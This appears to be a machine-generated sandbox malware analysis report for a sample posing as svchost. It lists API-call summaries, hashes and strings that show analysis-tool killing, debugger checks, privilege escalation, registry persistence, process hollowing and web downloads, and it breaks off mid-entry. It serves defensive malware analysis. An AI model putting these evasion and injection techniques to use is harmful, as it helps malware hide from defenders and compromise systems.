                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                                                  • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                  • Instruction ID: 1797bb151c3fa9dbe2cab4c77aa780fd97fdebd86b1d7d78c2bb3b3d77a7b3b6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2110631A0CA92C1E770DB20E48C36A63B0FFA4754F104238C69D92A98EF2DD508DB10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                                                  • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                  • Instruction ID: 2d13c28038ec91b99dfbb8dae2d24367b6962ee30324a43aa1d2f17bdb7ba816
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1931D72661C6C2C6D730DBA4E4983ABB3B0FB94744F50112AE68DD7A98EF7DD509CB10

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                                                  • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                  • Instruction ID: 151b6bec8ffde8a061455c0b782114579d8401cb79cb014855f20224848f06f4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F0FE21A0C283C1F7319BA5A40C37D67B0BFA5B08F2411B8D98D96594EF6CE50DDB31

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4294037311-0
                                                                                                                                                                                                  • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                  • Instruction ID: 40a58b751ec401df8f9a93507bc5568afc98fd7edc03ee7869848003d95b120b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91F0302590C647C2EA61AB20A44A37D23B0FFB5700F600439D98EE2A54DF2DD44DD620

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA390D
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3922
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3935
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3945
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3958
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA396D
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3980
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3AA9), ref: 00007FF68DEA3995
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA46E4: CreateFileW.KERNELBASE ref: 00007FF68DEA472B
                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 00007FF68DEA3376
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: GetCurrentProcess.KERNEL32 ref: 00007FF68DEA414B
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: OpenProcessToken.ADVAPI32 ref: 00007FF68DEA415E
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF68DEA4186
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: AdjustTokenPrivileges.KERNELBASE ref: 00007FF68DEA41B1
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: CloseHandle.KERNEL32 ref: 00007FF68DEA41BC
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: OpenProcess.KERNEL32 ref: 00007FF68DEA41D1
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA40E4: CloseHandle.KERNEL32 ref: 00007FF68DEA4249
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$CreateProcess$CloseFileHandleOpenToken$AdjustAttributesCurrentDirectoryFolderLookupPathPrivilegePrivilegesThreadValue
                                                                                                                                                                                                  • String ID: .x64
                                                                                                                                                                                                  • API String ID: 3156018730-2481150777
                                                                                                                                                                                                  • Opcode ID: afb6772baf312ace8b13902d488d759376c55ca1c170216b345ff2e1d52a3f88
                                                                                                                                                                                                  • Instruction ID: 3e84f0050e43ed9c30a51234d52d976e67c1b6e67e1427f19fd48db3e0eb2afc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: afb6772baf312ace8b13902d488d759376c55ca1c170216b345ff2e1d52a3f88
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2011A24A18543C5E750EB24E88D7B967B4BFA4304F90403AD80DE76A6EE3CE14DC770

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 418 7ff68dea1050-7ff68dea108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                  • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                  • Instruction ID: 309e00eb2d10a18bdd2afaf14acfb1da2d7301531367945b87301b203889f5c4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DE09276608F81C6C620EB15F88401AB7B4FBC8794F504125EACD82B28DF3CC169CB00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 419 7ff68dea3b24-7ff68dea3b33 420 7ff68dea3b35-7ff68dea3b42 VirtualFree 419->420 421 7ff68dea3b48-7ff68dea3b4c 419->421 420->421
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                  • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                  • Instruction ID: 6688748036f94df7366f43ded55787fcefa9ee3e49d8f4467a69d6baef31aa76
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7D0C921E38942C1E794AB26E889719A2A1FFD4B44F808039E68991564DE3CC499CF00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                                                  • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                  • Instruction ID: 7b04c2d590a9c3e8e16843158e40dbb655ed5f50ba199dff17405d73dbb564fc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF32CA32608AC2C6D774CB15E8987AAB7B1FB99B44F405139DA8D93B58EF3CD548CB10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF68DEA1D19
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                                                  • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                  • Instruction ID: 5f6490b314b122787ceb2bb7af227ebbb24eeb8dfcfedb5f4bba4b6cca63fc9a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F71D876618A82C2E750DB54F49836AB7B0FBE4795F105039FA8E93A68DF7CD448CB10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3117), ref: 00007FF68DEA460C
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3117), ref: 00007FF68DEA4649
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA3117), ref: 00007FF68DEA4654
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68DEA311C), ref: 00007FF68DEA3BC7
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3B84: RegSetValueExW.ADVAPI32 ref: 00007FF68DEA3BFD
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3B84: RegCloseKey.ADVAPI32 ref: 00007FF68DEA3C0C
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF68DEA3C3C
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF68DEA3E37
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3E24: Process32FirstW.KERNEL32 ref: 00007FF68DEA3E6A
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3E24: CloseHandle.KERNEL32 ref: 00007FF68DEA3E7C
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3E24: wcscmp.MSVCRT ref: 00007FF68DEA3E91
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3E24: OpenProcess.KERNEL32 ref: 00007FF68DEA3EA7
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3E24: TerminateProcess.KERNEL32 ref: 00007FF68DEA3ECA
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3E24: CloseHandle.KERNEL32 ref: 00007FF68DEA3ED8
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3E24: Process32NextW.KERNEL32 ref: 00007FF68DEA3EEB
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA3E24: CloseHandle.KERNEL32 ref: 00007FF68DEA3EFD
                                                                                                                                                                                                    • Part of subcall function 00007FF68DEA39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF68DEA3B0C), ref: 00007FF68DEA39E4
                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF68DEA31C6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                                                  • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                  • Instruction ID: 5791abb776b5fa69ef5584a59f7856735141faaaecdecbad8be0c1b4fffe53be
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8218820A18943D1EA14FBA0D89A1BC67B0BFB1754F90453DE42DE21E6FE2CA94DC630
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                                                  • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                  • Instruction ID: dc1a87cfb23386d0bfae3649df436fdaf7635926d77a21a81a4a0eb5a94b329e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E401ED22A0CA03C1E721EB11E88826D6770FFE8B55F155139D94EE2664EF3CD5CDC610
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                                                  • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                  • Instruction ID: a99da8f5d5f06dd36ea7e0df1cc2e597d1bdd6ddb2b72126dea9aa4c398f6f15
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C21AA31A0CA86C1E670DB11E88C36A63B0FFE4755F104239D99E925A8EF2DD949CB10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.3803542336.00007FF68DEA1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF68DEA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.3801907104.00007FF68DEA0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3804794737.00007FF68DEA5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805593731.00007FF68DEA7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3805844197.00007FF68DEA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.3806839554.00007FF68DEAA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff68dea0000_svchost.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                                                  • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
